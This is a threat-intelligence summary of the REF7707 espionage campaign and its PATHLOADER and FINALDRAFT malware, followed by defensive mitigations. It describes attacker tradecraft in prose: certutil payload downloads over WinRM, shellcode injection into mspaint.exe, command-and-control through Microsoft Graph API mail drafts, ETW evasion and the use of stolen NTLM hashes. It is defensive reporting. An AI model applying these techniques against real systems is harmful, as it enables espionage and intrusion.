Full Report
Threat hunters have shed light on a new campaign targeting the foreign ministry of an unnamed South American nation with bespoke malware capable of granting remote access to infected hosts. The activity, detected in November 2024, has been attributed by Elastic Security Labs to a threat cluster it tracks as REF7707. Some of the other targets include a telecommunications entity and a university,
Analysis Summary
# Threat Actor: REF7707
## Attribution & Identity
* **Attribution:** Tracked by Elastic Security Labs as **REF7707**.
* **Aliases/Associations:** Associated with the novel intrusion set deploying the FINALDRAFT malware.
## Activity Summary
* **Historical Activities/Campaigns:** Activity detected in November 2024. The campaign is described as a "well-engineered, highly capable, novel intrusion set," though the actors exhibited "poor campaign management and inconsistent evasion practices."
* **Objectives:** Espionage, gaining remote access to infected hosts.
## Tactics, Techniques & Procedures
* **Initial Access:** Exact initial access vector is unclear, but observed activity involves using the Windows `certutil` application to download secondary payloads from a web server. This was executed via the Windows Remote Management's Remote Shell plugin (`WinrsHost.exe`), suggesting the attackers already possessed valid network credentials for lateral movement.
* **Execution/Persistence:** Deploys the **PATHLOADER** malware first, which facilitates the execution of encrypted shellcode.
* **In-Memory Execution:** The harvested shellcode, identified as **FINALDRAFT**, is injected into the memory space of a newly spawned `mspaint.exe` process.
* **C2/Exfiltration:** FINALDRAFT abuses the **Microsoft Graph API** for command-and-control (C2). Commands are parsed from the mailbox's drafts folder, and results are written back into new draft emails. (Note: Similar C2 abuse was observed in the SIESTAGRAPH backdoor.)
* **Capabilities:** FINALDRAFT provides 37 command handlers, including process injection, file manipulation, and network proxy capabilities.
* **Defense Evasion (Windows):** Attempts to execute PowerShell commands without invoking `powershell.exe` by patching APIs to evade Event Tracing for Windows (ETW). It utilizes **PowerPick**, a legitimate utility, for command execution.
* **Credential Access:** Engineered to start new processes using stolen NTLM hashes.
* **MITRE ATT&CK IDs:** No specific IDs were provided in the text, but techniques map generally to Execution, Persistence, Evasion, and Command and Control.
## Targeting
* **Sectors:** Foreign Ministry, Telecommunications entity, University.
* **Geography:** One target identified as a South American nation's foreign ministry. Other targets are located in Southeast Asia.
* **Victims:** Unnamed South American foreign ministry; unnamed Southeast Asian telco; unnamed Southeast Asian university.
## Tools & Infrastructure
* **Malware Families:**
* PATHLOADER (Initial execution stage)
* FINALDRAFT (Full-featured Remote Administration Tool/Backdoor)
* **Infrastructure:** Communication utilized a web server associated with the targeted Foreign Ministry to host downloadable payloads. C2 relied heavily on the Microsoft Graph API (Outlook Drafts folder).
## Implications
REF7707 represents a sophisticated threat actor (albeit with poor operational security) utilizing cutting-edge techniques like leveraging the Microsoft Graph API for stealthy C2 communications across Windows and Linux environments, posing a significant espionage risk to governmental and critical infrastructure organizations. The use of stolen NTLM hashes for process creation indicates either successful credential theft or exploitation of existing network access.
## Mitigations
* Monitor for unusual activity related to Windows Remote Management (`WinrsHost.exe`) indicating lateral movement from compromised hosts.
* Scrutinize network traffic and event logs for the use of `certutil` to download suspicious files from internal web servers.
* Implement stricter controls and monitoring over the Microsoft Graph API usage, particularly looking for programmatic creation/manipulation of email Drafts folders by non-standard applications.
* Deploy advanced endpoint detection capable of monitoring for in-memory process injection, especially into system processes like `mspaint.exe`.
* Investigate and restrict the use of legitimate tools like **PowerPick** in unexpected contexts.
* Enhance NTLM hash protection mechanisms.